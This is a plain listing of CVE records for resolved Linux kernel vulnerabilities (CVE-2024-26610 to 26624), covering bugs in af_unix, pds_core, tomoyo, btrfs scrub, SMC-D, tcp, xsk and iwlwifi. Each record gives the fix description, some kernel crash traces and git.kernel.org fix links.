MISC:https://git.kernel.org/stable/c/3151051b787f7cd7e3329ea0016eb9113c248812   |   URL:https://git.kernel.org/stable/c/3151051b787f7cd7e3329ea0016eb9113c248812   |   MISC:https://git.kernel.org/stable/c/64babb17e8150771c58575d8f93a35c5296b499f   |   URL:https://git.kernel.org/stable/c/64babb17e8150771c58575d8f93a35c5296b499f   |   MISC:https://git.kernel.org/stable/c/6b950c712a9a05cdda4aea7fcb2848766576c11b   |   URL:https://git.kernel.org/stable/c/6b950c712a9a05cdda4aea7fcb2848766576c11b   |   MISC:https://git.kernel.org/stable/c/8e51f084b5716653f19e291ed5f026791d4b3ed4   |   URL:https://git.kernel.org/stable/c/8e51f084b5716653f19e291ed5f026791d4b3ed4   |   MISC:https://git.kernel.org/stable/c/9c333d9891f34cea8af1b229dc754552304c8eee   |   URL:https://git.kernel.org/stable/c/9c333d9891f34cea8af1b229dc754552304c8eee   |   MISC:https://git.kernel.org/stable/c/aa2b2eb3934859904c287bf5434647ba72e14c1c   |   URL:https://git.kernel.org/stable/c/aa2b2eb3934859904c287bf5434647ba72e14c1c   |   MISC:https://git.kernel.org/stable/c/d0b5b1f12429df3cd9751ab8b2f53729b77733b7   |   URL:https://git.kernel.org/stable/c/d0b5b1f12429df3cd9751ab8b2f53729b77733b7   |   MISC:https://git.kernel.org/stable/c/dbc1b89981f9c5360277071d33d7f04a43ffda4a   |   URL:https://git.kernel.org/stable/c/dbc1b89981f9c5360277071d33d7f04a43ffda4a    Assigned (20240219)
CVE    2024    26624    Candidate    In the Linux kernel, the following vulnerability has been resolved: af_unix: fix lockdep positive in sk_diag_dump_icons() syzbot reported a lockdep splat [1]. Blamed commit hinted about the possible lockdep violation, and code used unix_state_lock_nested() in an attempt to silence lockdep. It is not sufficient, because unix_state_lock_nested() is already used from unix_state_double_lock(). We need to use a separate subclass. This patch adds a distinct enumeration to make things more explicit. Also use swap() in unix_state_double_lock() as a clean up. v2: add a missing inline keyword to unix_state_lock_nested() [1] WARNING: possible circular locking dependency detected ---truncated---    MISC:https://git.kernel.org/stable/c/4d322dce82a1d44f8c83f0f54f95dd1b8dcf46c9   |   URL:https://git.kernel.org/stable/c/4d322dce82a1d44f8c83f0f54f95dd1b8dcf46c9   |   MISC:https://git.kernel.org/stable/c/5e7f3e0381c002cb2abde42f09ad511991a8ebaf   |   URL:https://git.kernel.org/stable/c/5e7f3e0381c002cb2abde42f09ad511991a8ebaf   |   MISC:https://git.kernel.org/stable/c/875f31aaa67e306098befa5e798a049075910fa7   |   URL:https://git.kernel.org/stable/c/875f31aaa67e306098befa5e798a049075910fa7   |   MISC:https://git.kernel.org/stable/c/a2104f43876408b164be5fd58f9b6a3a73b77746   |   URL:https://git.kernel.org/stable/c/a2104f43876408b164be5fd58f9b6a3a73b77746   |   MISC:https://git.kernel.org/stable/c/b169ffde733c5adf01788ae091c377f0eca44806   |   URL:https://git.kernel.org/stable/c/b169ffde733c5adf01788ae091c377f0eca44806   |   MISC:https://git.kernel.org/stable/c/c2d272a9a1e8f22ba584589219f6fe1886a3595f   |   URL:https://git.kernel.org/stable/c/c2d272a9a1e8f22ba584589219f6fe1886a3595f   |   MISC:https://git.kernel.org/stable/c/c8f6b3b864cb876e9ee21666a391c9ee290682ac   |   URL:https://git.kernel.org/stable/c/c8f6b3b864cb876e9ee21666a391c9ee290682ac   |   MISC:https://git.kernel.org/stable/c/f199018dc762dfa501f6d96a424468a0f3c10d9e   |   URL:https://git.kernel.org/stable/c/f199018dc762dfa501f6d96a424468a0f3c10d9e    Assigned (20240219)
CVE    2024    26623    Candidate    In the Linux kernel, the following vulnerability has been resolved: pds_core: Prevent race issues involving the adminq There are multiple paths that can result in using the pdsc's adminq. [1] pdsc_adminq_isr and the resulting work from queue_work(), i.e. pdsc_work_thread()->pdsc_process_adminq() [2] pdsc_adminq_post() When the device goes through reset via PCIe reset and/or a fw_down/fw_up cycle due to bad PCIe state or bad device state the adminq is destroyed and recreated. A NULL pointer dereference can happen if [1] or [2] happens after the adminq is already destroyed. In order to fix this, add some further state checks and implement reference counting for adminq uses. Reference counting was used because multiple threads can attempt to access the adminq at the same time via [1] or [2]. Additionally, multiple clients (i.e. pds-vfio-pci) can be using [2] at the same time. The adminq_refcnt is initialized to 1 when the adminq has been allocated and is ready to use. Users/clients of the adminq (i.e. [1] and [2]) will increment the refcnt when they are using the adminq. When the driver goes into a fw_down cycle it will set the PDSC_S_FW_DEAD bit and then wait for the adminq_refcnt to hit 1. Setting the PDSC_S_FW_DEAD before waiting will prevent any further adminq_refcnt increments. Waiting for the adminq_refcnt to hit 1 allows for any current users of the adminq to finish before the driver frees the adminq. Once the adminq_refcnt hits 1 the driver clears the refcnt to signify that the adminq is deleted and cannot be used. On the fw_up cycle the driver will once again initialize the adminq_refcnt to 1 allowing the adminq to be used again.    
MISC:https://git.kernel.org/stable/c/22cd6046eb2148b18990257505834dd45c672a1b   |   URL:https://git.kernel.org/stable/c/22cd6046eb2148b18990257505834dd45c672a1b   |   MISC:https://git.kernel.org/stable/c/5939feb63ea1f011027576c64b68b681cbad31ca   |   URL:https://git.kernel.org/stable/c/5939feb63ea1f011027576c64b68b681cbad31ca   |   MISC:https://git.kernel.org/stable/c/7e82a8745b951b1e794cc780d46f3fbee5e93447   |   URL:https://git.kernel.org/stable/c/7e82a8745b951b1e794cc780d46f3fbee5e93447    Assigned (20240219)
CVE    2024    26622    Candidate    In the Linux kernel, the following vulnerability has been resolved: tomoyo: fix UAF write bug in tomoyo_write_control() Since tomoyo_write_control() updates head->write_buf when write() of long lines is requested, we need to fetch head->write_buf after head->io_sem is held. Otherwise, concurrent write() requests can cause use-after-free-write and double-free problems.    FEDORA:FEDORA-2024-5db5954a5e   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KSXNF4RLEFLH35BFUQGYXRRVHHUIVBAE/   |   FEDORA:FEDORA-2024-f797f1540e   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IVVYSTEVMPYGF6GDSOD44MUXZXAZHOHB/   |   MISC:https://git.kernel.org/stable/c/2caa605079488da9601099fbda460cfc1702839f   |   URL:https://git.kernel.org/stable/c/2caa605079488da9601099fbda460cfc1702839f   |   MISC:https://git.kernel.org/stable/c/2f03fc340cac9ea1dc63cbf8c93dd2eb0f227815   |   URL:https://git.kernel.org/stable/c/2f03fc340cac9ea1dc63cbf8c93dd2eb0f227815   |   MISC:https://git.kernel.org/stable/c/3bfe04c1273d30b866f4c7c238331ed3b08e5824   |   URL:https://git.kernel.org/stable/c/3bfe04c1273d30b866f4c7c238331ed3b08e5824   |   MISC:https://git.kernel.org/stable/c/6edefe1b6c29a9932f558a898968a9fcbeec5711   |   URL:https://git.kernel.org/stable/c/6edefe1b6c29a9932f558a898968a9fcbeec5711   |   MISC:https://git.kernel.org/stable/c/7d930a4da17958f869ef679ee0e4a8729337affc   |   URL:https://git.kernel.org/stable/c/7d930a4da17958f869ef679ee0e4a8729337affc   |   MISC:https://git.kernel.org/stable/c/a23ac1788e2c828c097119e9a3178f0b7e503fee   |   URL:https://git.kernel.org/stable/c/a23ac1788e2c828c097119e9a3178f0b7e503fee    Assigned (20240219)
CVE    2024    26621    Candidate    In the Linux kernel, the following vulnerability has been resolved: mm: huge_memory: don't force huge page alignment on 32 bit commit efa7df3e3bb5 ("mm: align larger anonymous mappings on THP boundaries") caused two issues [1] [2] reported on 32 bit system or compat userspace. It doesn't make too much sense to force huge page alignment on 32 bit system due to the constrained virtual address space. [1] https://lore.kernel.org/linux-mm/d0a136a0-4a31-46bc-adf4-2db109a61672@kernel.org/ [2] https://lore.kernel.org/linux-mm/CAJuCfpHXLdQy1a2B6xN2d7quTYwg2OoZseYPZTRpU0eHHKD-sQ@mail.gmail.com/    MISC:https://git.kernel.org/stable/c/4ef9ad19e17676b9ef071309bc62020e2373705d   |   URL:https://git.kernel.org/stable/c/4ef9ad19e17676b9ef071309bc62020e2373705d   |   MISC:https://git.kernel.org/stable/c/7432376c913381c5f24d373a87ff629bbde94b47   |   URL:https://git.kernel.org/stable/c/7432376c913381c5f24d373a87ff629bbde94b47   |   MISC:https://git.kernel.org/stable/c/87632bc9ecff5ded93433bc0fca428019bdd1cfe   |   URL:https://git.kernel.org/stable/c/87632bc9ecff5ded93433bc0fca428019bdd1cfe    Assigned (20240219)
CVE    2024    26620    Candidate    In the Linux kernel, the following vulnerability has been resolved: s390/vfio-ap: always filter entire AP matrix The vfio_ap_mdev_filter_matrix function is called whenever a new adapter or domain is assigned to the mdev. The purpose of the function is to update the guest's AP configuration by filtering the matrix of adapters and domains assigned to the mdev. When an adapter or domain is assigned, only the APQNs associated with the APID of the new adapter or APQI of the new domain are inspected. If an APQN does not reference a queue device bound to the vfio_ap device driver, then its APID will be filtered from the mdev's matrix when updating the guest's AP configuration. Inspecting only the APID of the new adapter or APQI of the new domain will result in passing AP queues through to a guest that are not bound to the vfio_ap device driver under certain circumstances. Consider the following: guest's AP configuration (all also assigned to the mdev's matrix): 14.0004 14.0005 14.0006 16.0004 16.0005 16.0006 unassign domain 4 unbind queue 16.0005 assign domain 4 When domain 4 is re-assigned, since only domain 4 will be inspected, the APQNs that will be examined will be: 14.0004 16.0004 Since both of those APQNs reference queue devices that are bound to the vfio_ap device driver, nothing will get filtered from the mdev's matrix when updating the guest's AP configuration. Consequently, queue 16.0005 will get passed through despite not being bound to the driver. This violates the linux device model requirement that a guest shall only be given access to devices bound to the device driver facilitating their pass-through. To resolve this problem, every adapter and domain assigned to the mdev will be inspected when filtering the mdev's matrix.    
MISC:https://git.kernel.org/stable/c/850fb7fa8c684a4c6bf0e4b6978f4ddcc5d43d11   |   URL:https://git.kernel.org/stable/c/850fb7fa8c684a4c6bf0e4b6978f4ddcc5d43d11   |   MISC:https://git.kernel.org/stable/c/c69d821197611678533fb3eb784fc823b921349a   |   URL:https://git.kernel.org/stable/c/c69d821197611678533fb3eb784fc823b921349a   |   MISC:https://git.kernel.org/stable/c/cdd134d56138302976685e6c7bc4755450b3880e   |   URL:https://git.kernel.org/stable/c/cdd134d56138302976685e6c7bc4755450b3880e   |   MISC:https://git.kernel.org/stable/c/d6b8d034b576f406af920a7bee81606c027b24c6   |   URL:https://git.kernel.org/stable/c/d6b8d034b576f406af920a7bee81606c027b24c6    Assigned (20240219)
CVE    2024    26619    Candidate    In the Linux kernel, the following vulnerability has been resolved: riscv: Fix module loading free order Reverse order of kfree calls to resolve use-after-free error.    MISC:https://git.kernel.org/stable/c/2fa79badf4bfeffda6b5032cf62b828486ec9a99   |   URL:https://git.kernel.org/stable/c/2fa79badf4bfeffda6b5032cf62b828486ec9a99   |   MISC:https://git.kernel.org/stable/c/78996eee79ebdfe8b6f0e54cb6dcc792d5129291   |   URL:https://git.kernel.org/stable/c/78996eee79ebdfe8b6f0e54cb6dcc792d5129291    Assigned (20240219)
CVE    2024    26618    Candidate    In the Linux kernel, the following vulnerability has been resolved: arm64/sme: Always exit sme_alloc() early with existing storage When sme_alloc() is called with existing storage and we are not flushing we will always allocate new storage, both leaking the existing storage and corrupting the state. Fix this by separating the checks for flushing and for existing storage as we do for SVE. Callers that reallocate (eg, due to changing the vector length) should call sme_free() themselves.    MISC:https://git.kernel.org/stable/c/569156e4fa347237f8fa2a7e935d860109c55ac4   |   URL:https://git.kernel.org/stable/c/569156e4fa347237f8fa2a7e935d860109c55ac4   |   MISC:https://git.kernel.org/stable/c/814af6b4e6000e574e74d92197190edf07cc3680   |   URL:https://git.kernel.org/stable/c/814af6b4e6000e574e74d92197190edf07cc3680   |   MISC:https://git.kernel.org/stable/c/dc7eb8755797ed41a0d1b5c0c39df3c8f401b3d9   |   URL:https://git.kernel.org/stable/c/dc7eb8755797ed41a0d1b5c0c39df3c8f401b3d9    Assigned (20240219)
CVE    2024    26617    Candidate    In the Linux kernel, the following vulnerability has been resolved: fs/proc/task_mmu: move mmu notification mechanism inside mm lock Move mmu notification mechanism inside mm lock to prevent race condition in other components which depend on it. The notifier will invalidate memory range. Depending upon the number of iterations, different memory ranges would be invalidated. The following warning would be removed by this patch: WARNING: CPU: 0 PID: 5067 at arch/x86/kvm/../../../virt/kvm/kvm_main.c:734 kvm_mmu_notifier_change_pte+0x860/0x960 arch/x86/kvm/../../../virt/kvm/kvm_main.c:734 There is no behavioural and performance change with this patch when there is no component registered with the mmu notifier. [akpm@linux-foundation.org: narrow the scope of `range', per Sean]    MISC:https://git.kernel.org/stable/c/05509adf297924f51e1493aa86f9fcde1433ed80   |   URL:https://git.kernel.org/stable/c/05509adf297924f51e1493aa86f9fcde1433ed80   |   MISC:https://git.kernel.org/stable/c/4cccb6221cae6d020270606b9e52b1678fc8b71a   |   URL:https://git.kernel.org/stable/c/4cccb6221cae6d020270606b9e52b1678fc8b71a    Assigned (20240219)
CVE    2024    26616    Candidate    In the Linux kernel, the following vulnerability has been resolved: btrfs: scrub: avoid use-after-free when chunk length is not 64K aligned [BUG] There is a bug report that, on an ext4-converted btrfs, scrub leads to various problems, including: - "unable to find chunk map" errors BTRFS info (device vdb): scrub: started on devid 1 BTRFS critical (device vdb): unable to find chunk map for logical 2214744064 length 4096 BTRFS critical (device vdb): unable to find chunk map for logical 2214744064 length 45056 This would lead to unrepairable errors. - Use-after-free KASAN reports: ================================================================== BUG: KASAN: slab-use-after-free in __blk_rq_map_sg+0x18f/0x7c0 Read of size 8 at addr ffff8881013c9040 by task btrfs/909 CPU: 0 PID: 909 Comm: btrfs Not tainted 6.7.0-x64v3-dbg #11 c50636e9419a8354555555245df535e380563b2b Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 2023.11-2 12/24/2023 Call Trace: <TASK> dump_stack_lvl+0x43/0x60 print_report+0xcf/0x640 kasan_report+0xa6/0xd0 __blk_rq_map_sg+0x18f/0x7c0 virtblk_prep_rq.isra.0+0x215/0x6a0 [virtio_blk 19a65eeee9ae6fcf02edfad39bb9ddee07dcdaff] virtio_queue_rqs+0xc4/0x310 [virtio_blk 19a65eeee9ae6fcf02edfad39bb9ddee07dcdaff] blk_mq_flush_plug_list.part.0+0x780/0x860 __blk_flush_plug+0x1ba/0x220 blk_finish_plug+0x3b/0x60 submit_initial_group_read+0x10a/0x290 [btrfs e57987a360bed82fe8756dcd3e0de5406ccfe965] flush_scrub_stripes+0x38e/0x430 [btrfs e57987a360bed82fe8756dcd3e0de5406ccfe965] scrub_stripe+0x82a/0xae0 [btrfs e57987a360bed82fe8756dcd3e0de5406ccfe965] scrub_chunk+0x178/0x200 [btrfs e57987a360bed82fe8756dcd3e0de5406ccfe965] scrub_enumerate_chunks+0x4bc/0xa30 [btrfs e57987a360bed82fe8756dcd3e0de5406ccfe965] btrfs_scrub_dev+0x398/0x810 [btrfs e57987a360bed82fe8756dcd3e0de5406ccfe965] btrfs_ioctl+0x4b9/0x3020 [btrfs e57987a360bed82fe8756dcd3e0de5406ccfe965] __x64_sys_ioctl+0xbd/0x100 do_syscall_64+0x5d/0xe0 
entry_SYSCALL_64_after_hwframe+0x63/0x6b RIP: 0033:0x7f47e5e0952b - Crash, mostly due to above use-after-free [CAUSE] The converted fs has the following data chunk layout: item 2 key (FIRST_CHUNK_TREE CHUNK_ITEM 2214658048) itemoff 16025 itemsize 80 length 86016 owner 2 stripe_len 65536 type DATA|single For above logical bytenr 2214744064, it's at the chunk end (2214658048 + 86016 = 2214744064). This means btrfs_submit_bio() would split the bio, and trigger endio function for both of the two halves. However scrub_submit_initial_read() would only expect the endio function to be called once, not any more. This means the first endio function would already free the bbio::bio, leaving the bvec freed, thus the 2nd endio call would lead to use-after-free. [FIX] - Make sure scrub_read_endio() only updates bits in its range Since we may read less than 64K at the end of the chunk, we should not touch the bits beyond chunk boundary. - Make sure scrub_submit_initial_read() only to read the chunk range This is done by calculating the real number of sectors we need to read, and add sector-by-sector to the bio. Thankfully the scrub read repair path won't need extra fixes: - scrub_stripe_submit_repair_read() With above fixes, we won't update error bit for range beyond chunk, thus scrub_stripe_submit_repair_read() should never submit any read beyond the chunk.    MISC:https://git.kernel.org/stable/c/34de0f04684ec00c093a0455648be055f0e8e24f   |   URL:https://git.kernel.org/stable/c/34de0f04684ec00c093a0455648be055f0e8e24f   |   MISC:https://git.kernel.org/stable/c/642b9c520ef2f104277ad1f902f8526edbe087fb   |   URL:https://git.kernel.org/stable/c/642b9c520ef2f104277ad1f902f8526edbe087fb   |   MISC:https://git.kernel.org/stable/c/f546c4282673497a06ecb6190b50ae7f6c85b02f   |   URL:https://git.kernel.org/stable/c/f546c4282673497a06ecb6190b50ae7f6c85b02f    Assigned (20240219)
CVE    2024    26615    Candidate    In the Linux kernel, the following vulnerability has been resolved: net/smc: fix illegal rmb_desc access in SMC-D connection dump A crash was found when dumping SMC-D connections. It can be reproduced by following steps: - run nginx/wrk test: smc_run nginx smc_run wrk -t 16 -c 1000 -d <duration> -H 'Connection: Close' <URL> - continuously dump SMC-D connections in parallel: watch -n 1 'smcss -D' BUG: kernel NULL pointer dereference, address: 0000000000000030 CPU: 2 PID: 7204 Comm: smcss Kdump: loaded Tainted: G E 6.7.0+ #55 RIP: 0010:__smc_diag_dump.constprop.0+0x5e5/0x620 [smc_diag] Call Trace: <TASK> ? __die+0x24/0x70 ? page_fault_oops+0x66/0x150 ? exc_page_fault+0x69/0x140 ? asm_exc_page_fault+0x26/0x30 ? __smc_diag_dump.constprop.0+0x5e5/0x620 [smc_diag] ? __kmalloc_node_track_caller+0x35d/0x430 ? __alloc_skb+0x77/0x170 smc_diag_dump_proto+0xd0/0xf0 [smc_diag] smc_diag_dump+0x26/0x60 [smc_diag] netlink_dump+0x19f/0x320 __netlink_dump_start+0x1dc/0x300 smc_diag_handler_dump+0x6a/0x80 [smc_diag] ? __pfx_smc_diag_dump+0x10/0x10 [smc_diag] sock_diag_rcv_msg+0x121/0x140 ? __pfx_sock_diag_rcv_msg+0x10/0x10 netlink_rcv_skb+0x5a/0x110 sock_diag_rcv+0x28/0x40 netlink_unicast+0x22a/0x330 netlink_sendmsg+0x1f8/0x420 __sock_sendmsg+0xb0/0xc0 ____sys_sendmsg+0x24e/0x300 ? copy_msghdr_from_user+0x62/0x80 ___sys_sendmsg+0x7c/0xd0 ? __do_fault+0x34/0x160 ? do_read_fault+0x5f/0x100 ? do_fault+0xb0/0x110 ? __handle_mm_fault+0x2b0/0x6c0 __sys_sendmsg+0x4d/0x80 do_syscall_64+0x69/0x180 entry_SYSCALL_64_after_hwframe+0x6e/0x76 It is possible that the connection is in process of being established when we dump it. Assumed that the connection has been registered in a link group by smc_conn_create() but the rmb_desc has not yet been initialized by smc_buf_create(), thus causing the illegal access to conn->rmb_desc. So fix it by checking before dump.    
MISC:https://git.kernel.org/stable/c/1fea9969b81c67d0cb1611d1b8b7d19049d937be   |   URL:https://git.kernel.org/stable/c/1fea9969b81c67d0cb1611d1b8b7d19049d937be   |   MISC:https://git.kernel.org/stable/c/27aea64838914c6122db5b8bd4bed865c9736f22   |   URL:https://git.kernel.org/stable/c/27aea64838914c6122db5b8bd4bed865c9736f22   |   MISC:https://git.kernel.org/stable/c/5fed92ca32eafbfae8b6bee8ca34cca71c6a8b6d   |   URL:https://git.kernel.org/stable/c/5fed92ca32eafbfae8b6bee8ca34cca71c6a8b6d   |   MISC:https://git.kernel.org/stable/c/68b888d51ac82f2b96bf5e077a31d76afcdef25a   |   URL:https://git.kernel.org/stable/c/68b888d51ac82f2b96bf5e077a31d76afcdef25a   |   MISC:https://git.kernel.org/stable/c/6994dba06321e3c48fdad0ba796a063d9d82183a   |   URL:https://git.kernel.org/stable/c/6994dba06321e3c48fdad0ba796a063d9d82183a   |   MISC:https://git.kernel.org/stable/c/8f3f9186e5bb96a9c9654c41653210e3ea7e48a6   |   URL:https://git.kernel.org/stable/c/8f3f9186e5bb96a9c9654c41653210e3ea7e48a6   |   MISC:https://git.kernel.org/stable/c/a164c2922675d7051805cdaf2b07daffe44f20d9   |   URL:https://git.kernel.org/stable/c/a164c2922675d7051805cdaf2b07daffe44f20d9   |   MISC:https://git.kernel.org/stable/c/dbc153fd3c142909e564bb256da087e13fbf239c   |   URL:https://git.kernel.org/stable/c/dbc153fd3c142909e564bb256da087e13fbf239c    Assigned (20240219)
CVE    2024    26614    Candidate    In the Linux kernel, the following vulnerability has been resolved: tcp: make sure init the accept_queue's spinlocks once When I run syz's reproduction C program locally, it causes the following issue: pvqspinlock: lock 0xffff9d181cd5c660 has corrupted value 0x0! WARNING: CPU: 19 PID: 21160 at __pv_queued_spin_unlock_slowpath (kernel/locking/qspinlock_paravirt.h:508) Hardware name: Red Hat KVM, BIOS 0.5.1 01/01/2011 RIP: 0010:__pv_queued_spin_unlock_slowpath (kernel/locking/qspinlock_paravirt.h:508) Call Trace: <IRQ> _raw_spin_unlock (kernel/locking/spinlock.c:186) inet_csk_reqsk_queue_add (net/ipv4/inet_connection_sock.c:1321) inet_csk_complete_hashdance (net/ipv4/inet_connection_sock.c:1358) tcp_check_req (net/ipv4/tcp_minisocks.c:868) tcp_v4_rcv (net/ipv4/tcp_ipv4.c:2260) ip_protocol_deliver_rcu (net/ipv4/ip_input.c:205) ip_local_deliver_finish (net/ipv4/ip_input.c:234) __netif_receive_skb_one_core (net/core/dev.c:5529) process_backlog (./include/linux/rcupdate.h:779) __napi_poll (net/core/dev.c:6533) net_rx_action (net/core/dev.c:6604) __do_softirq (./arch/x86/include/asm/jump_label.h:27) do_softirq (kernel/softirq.c:454 kernel/softirq.c:441) </IRQ> <TASK> 
__local_bh_enable_ip (kernel/softirq.c:381) __dev_queue_xmit (net/core/dev.c:4374) ip_finish_output2 (./include/net/neighbour.h:540 net/ipv4/ip_output.c:235) __ip_queue_xmit (net/ipv4/ip_output.c:535) __tcp_transmit_skb (net/ipv4/tcp_output.c:1462) tcp_rcv_synsent_state_process (net/ipv4/tcp_input.c:6469) tcp_rcv_state_process (net/ipv4/tcp_input.c:6657) tcp_v4_do_rcv (net/ipv4/tcp_ipv4.c:1929) __release_sock (./include/net/sock.h:1121 net/core/sock.c:2968) release_sock (net/core/sock.c:3536) inet_wait_for_connect (net/ipv4/af_inet.c:609) __inet_stream_connect (net/ipv4/af_inet.c:702) inet_stream_connect (net/ipv4/af_inet.c:748) __sys_connect (./include/linux/file.h:45 net/socket.c:2064) __x64_sys_connect (net/socket.c:2073 net/socket.c:2070 net/socket.c:2070) do_syscall_64 (arch/x86/entry/common.c:51 arch/x86/entry/common.c:82) entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:129) </TASK> The issue triggering process is analyzed as follows: Thread A Thread B tcp_v4_rcv //receive ack TCP packet inet_shutdown tcp_check_req tcp_disconnect //disconnect sock ... tcp_set_state(sk, TCP_CLOSE) inet_csk_complete_hashdance ... 
inet_csk_reqsk_queue_add ---truncated---    MISC:https://git.kernel.org/stable/c/168e7e599860654876c2a1102a82610285c02f02   |   URL:https://git.kernel.org/stable/c/168e7e599860654876c2a1102a82610285c02f02   |   MISC:https://git.kernel.org/stable/c/198bc90e0e734e5f98c3d2833e8390cac3df61b2   |   URL:https://git.kernel.org/stable/c/198bc90e0e734e5f98c3d2833e8390cac3df61b2   |   MISC:https://git.kernel.org/stable/c/3982fe726a63fb3de6005e534e2ac8ca7e0aca2a   |   URL:https://git.kernel.org/stable/c/3982fe726a63fb3de6005e534e2ac8ca7e0aca2a   |   MISC:https://git.kernel.org/stable/c/b1e0a68a0cd2a83259c444f638b417a8fffc6855   |   URL:https://git.kernel.org/stable/c/b1e0a68a0cd2a83259c444f638b417a8fffc6855   |   MISC:https://git.kernel.org/stable/c/bc99dcedd2f422d602516762b96c8ef1ae6b2882   |   URL:https://git.kernel.org/stable/c/bc99dcedd2f422d602516762b96c8ef1ae6b2882   |   MISC:https://git.kernel.org/stable/c/d86cc6ab33b085eaef27ea88b78fc8e2375c0ef3   |   URL:https://git.kernel.org/stable/c/d86cc6ab33b085eaef27ea88b78fc8e2375c0ef3    Assigned (20240219)
CVE    2024    26612    Candidate    In the Linux kernel, the following vulnerability has been resolved: netfs, fscache: Prevent Oops in fscache_put_cache() This function dereferences "cache" and then checks if it's IS_ERR_OR_NULL(). Check first, then dereference.    MISC:https://git.kernel.org/stable/c/1c45256e599061021e2c848952e50f406457e448   |   URL:https://git.kernel.org/stable/c/1c45256e599061021e2c848952e50f406457e448   |   MISC:https://git.kernel.org/stable/c/3be0b3ed1d76c6703b9ee482b55f7e01c369cc68   |   URL:https://git.kernel.org/stable/c/3be0b3ed1d76c6703b9ee482b55f7e01c369cc68   |   MISC:https://git.kernel.org/stable/c/4200ad3e46ce50f410fdda302745489441bc70f0   |   URL:https://git.kernel.org/stable/c/4200ad3e46ce50f410fdda302745489441bc70f0   |   MISC:https://git.kernel.org/stable/c/82a9bc343ba019665d3ddc1d9a180bf0e0390cf3   |   URL:https://git.kernel.org/stable/c/82a9bc343ba019665d3ddc1d9a180bf0e0390cf3    Assigned (20240219)
CVE    2024    26611    Candidate    In the Linux kernel, the following vulnerability has been resolved: xsk: fix usage of multi-buffer BPF helpers for ZC XDP Currently when packet is shrunk via bpf_xdp_adjust_tail() and memory type is set to MEM_TYPE_XSK_BUFF_POOL, null ptr dereference happens: [1136314.192256] BUG: kernel NULL pointer dereference, address: 0000000000000034 [1136314.203943] #PF: supervisor read access in kernel mode [1136314.213768] #PF: error_code(0x0000) - not-present page [1136314.223550] PGD 0 P4D 0 [1136314.230684] Oops: 0000 [#1] PREEMPT SMP NOPTI [1136314.239621] CPU: 8 PID: 54203 Comm: xdpsock Not tainted 6.6.0+ #257 [1136314.250469] Hardware name: Intel Corporation S2600WFT/S2600WFT, BIOS SE5C620.86B.02.01.0008.031920191559 03/19/2019 [1136314.265615] RIP: 0010:__xdp_return+0x6c/0x210 [1136314.439143] Call Trace: 
[1136314.446058] <IRQ> [1136314.452465] ? __die+0x20/0x70 [1136314.459881] ? page_fault_oops+0x15b/0x440 [1136314.468305] ? exc_page_fault+0x6a/0x150 [1136314.476491] ? asm_exc_page_fault+0x22/0x30 [1136314.484927] ? __xdp_return+0x6c/0x210 [1136314.492863] bpf_xdp_adjust_tail+0x155/0x1d0 [1136314.501269] bpf_prog_ccc47ae29d3b6570_xdp_sock_prog+0x15/0x60 [1136314.511263] ice_clean_rx_irq_zc+0x206/0xc60 [ice] [1136314.520222] ? ice_xmit_zc+0x6e/0x150 [ice] [1136314.528506] ice_napi_poll+0x467/0x670 [ice] [1136314.536858] ? ttwu_do_activate.constprop.0+0x8f/0x1a0 [1136314.546010] __napi_poll+0x29/0x1b0 [1136314.553462] net_rx_action+0x133/0x270 [1136314.561619] __do_softirq+0xbe/0x28e [1136314.569303] do_softirq+0x3f/0x60 This comes from __xdp_return() call with xdp_buff argument passed as NULL which is supposed to be consumed by xsk_buff_free() call. To address this properly, in ZC case, a node that represents the frag being removed has to be pulled out of xskb_list. Introduce appropriate xsk helpers to do such node operation and use them accordingly within bpf_xdp_adjust_tail().    MISC:https://git.kernel.org/stable/c/5cd781f7216f980207af09c5e0e1bb1eda284540   |   URL:https://git.kernel.org/stable/c/5cd781f7216f980207af09c5e0e1bb1eda284540   |   MISC:https://git.kernel.org/stable/c/82ee4781b8200e44669a354140d5c6bd966b8768   |   URL:https://git.kernel.org/stable/c/82ee4781b8200e44669a354140d5c6bd966b8768   |   MISC:https://git.kernel.org/stable/c/c5114710c8ce86b8317e9b448f4fd15c711c2a82   |   URL:https://git.kernel.org/stable/c/c5114710c8ce86b8317e9b448f4fd15c711c2a82    Assigned (20240219)
CVE    2024    26610    Candidate    In the Linux kernel, the following vulnerability has been resolved: wifi: iwlwifi: fix a memory corruption iwl_fw_ini_trigger_tlv::data is a pointer to a __le32, which means that if we copy to iwl_fw_ini_trigger_tlv::data + offset while offset is in bytes, we'll write past the buffer.    MISC:https://git.kernel.org/stable/c/05dd9facfb9a1e056752c0901c6e86416037d15a   |   URL:https://git.kernel.org/stable/c/05dd9facfb9a1e056752c0901c6e86416037d15a   |   MISC:https://git.kernel.org/stable/c/870171899d75d43e3d14360f3a4850e90a9c289b   |   URL:https://git.kernel.org/stable/c/870171899d75d43e3d14360f3a4850e90a9c289b   |   MISC:https://git.kernel.org/stable/c/99a23462fe1a6f709f0fda3ebbe8b6b193ac75bd   |   URL:https://git.kernel.org/stable/c/99a23462fe1a6f709f0fda3ebbe8b6b193ac75bd   |   MISC:https://git.kernel.org/stable/c/aa2cc9363926991ba74411e3aa0a0ea82c1ffe32   |   URL:https://git.kernel.org/stable/c/aa2cc9363926991ba74411e3aa0a0ea82c1ffe32   |   MISC:https://git.kernel.org/stable/c/cf4a0d840ecc72fcf16198d5e9c505ab7d5a5e4d   |   URL:https://git.kernel.org/stable/c/cf4a0d840ecc72fcf16198d5e9c505ab7d5a5e4d   |   MISC:https://git.kernel.org/stable/c/f32a81999d0b8e5ce60afb5f6a3dd7241c17dd67   |   URL:https://git.kernel.org/stable/c/f32a81999d0b8e5ce60afb5f6a3dd7241c17dd67    Assigned (20240219)
